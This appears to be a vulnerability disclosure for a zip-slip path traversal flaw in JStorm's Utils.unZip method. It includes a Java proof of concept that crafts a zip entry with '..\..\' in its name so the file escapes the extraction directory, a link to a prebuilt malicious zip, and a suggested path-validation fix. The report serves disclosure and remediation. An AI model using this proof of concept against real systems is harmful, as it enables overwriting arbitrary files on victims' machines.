Use the following zip() method to create a zip file from a txt file, and the name of the compressed file will be renamed to "....\a\b\c\poc.txt". (You should create this path firstly)
Then call the Utils.unZip() method, originally intended to unzip the file to "D:\project\TestProject\ICFuzzTest\testData\unzip", but it will eventually be extracted to its another directory "D:\project\TestProject\ICFuzzTest\a\b\c\poc.txt".
This may cause the original file to be overwritten by a high-risk file.
import backtype.storm.utils.Utils;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;
/**
* 在Jstorm中存在unZip方法,可能有路径穿越的问题
*/
public class Jstorm {
//https://github.com/alibaba/jstorm/blob/5d6cde22dbca7df3d6e6830bf94f98a6639ab559/jstorm-core/src/main/java/backtype/storm/utils/Utils.java#L1321
public static void main(String[] args) throws IOException {
zip(); // create a poc
String zipFile = "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip\\poc.zip";
String destination = "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip";
Utils.unZip(new File(zipFile), new File(destination));
}
// create a poc
public static void zip() {
ZipOutputStream zos = null;
try {
zos = new ZipOutputStream(new FileOutputStream(
"D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip\\poc.zip"));
String srcFile = "..\\..\\a\\b\\c\\poc.txt"; // the next filePath
String destFile = "D:\\project\\TestProject\\ICFuzzTest\\testData\\unzip\\poc.txt";
zos.putNextEntry(new ZipEntry(srcFile));
FileInputStream in = new FileInputStream(destFile);
int len;
byte[] buf = new byte[1024];
while ((len = in.read(buf)) != -1) {
zos.write(buf, 0, len);
}
zos.closeEntry();
in.close();
} catch (Exception e) {
throw new RuntimeException("zip error from ZipUtils", e);
} finally {
if (zos != null) {
try {
zos.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
}
I think we can add a simple verification check on the path to avoid this issue. We can refer to other verification methods for unzip under Apache, such as:
Description
In the method "unZip" (line 1321) of the file https://github.com/alibaba/jstorm/blob/5d6cde22dbca7df3d6e6830bf94f98a6639ab559/jstorm-core/src/main/java/backtype/storm/utils/Utils.java#L1321 , it is possible to input malicious zip files, which can result in the high-risk files after decompression being stored in any location, even leading to file overwrite and other situations.
Proof of Concept
Use the following zip() method to create a zip file from a txt file, and the name of the compressed file will be renamed to "....\a\b\c\poc.txt". (You should create this path firstly) Then call the Utils.unZip() method, originally intended to unzip the file to "D:\project\TestProject\ICFuzzTest\testData\unzip", but it will eventually be extracted to its another directory "D:\project\TestProject\ICFuzzTest\a\b\c\poc.txt". This may cause the original file to be overwritten by a high-risk file.
The following is the constructed zip file:
https://github.com/Zlase0820/VulnData/blob/main/src.main/data/poc.zip
Suggestion
I think we can add a simple verification check on the path to avoid this issue. We can refer to other verification methods for unzip under Apache, such as:
https://github.com/apache/druid/blob/master/processing/src/main/java/org/apache/druid/utils/CompressionUtils.java#L242
He has the same error,and fixed in CVE-2023-27603.